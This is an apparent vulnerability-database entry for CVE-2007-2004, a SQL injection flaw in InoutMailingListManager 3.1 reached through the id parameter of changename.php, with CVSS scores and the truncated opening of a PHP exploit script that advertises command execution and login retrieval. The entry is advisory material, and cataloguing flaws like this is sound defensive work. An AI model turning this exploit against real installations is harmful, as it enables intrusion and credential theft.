7.5
CVSSv2

CVE-2007-2004

Published: 12/04/2007 Updated: 11/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple SQL injection vulnerabilities in InoutMailingListManager 3.1 and previous versions allow remote malicious users to execute arbitrary SQL commands via the id parameter to changename.php and other unspecified vectors.

Vulnerable Product Search on Vulmon Subscribe to Product

inoutmailinglistmanager inoutmailinglistmanager

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo " InoutMailingListManager <= 31 Command Execution Exploit + Login Retrieve + Advisory by BlackHawk <hawkgotyou@gmailcom> <itablackhawkaltervistaorg> Thanks to rgod for the php code and Marty for the Love "; if ($argc<4) { echo "Usage: php "$argv[0]" Site CMD Host: ...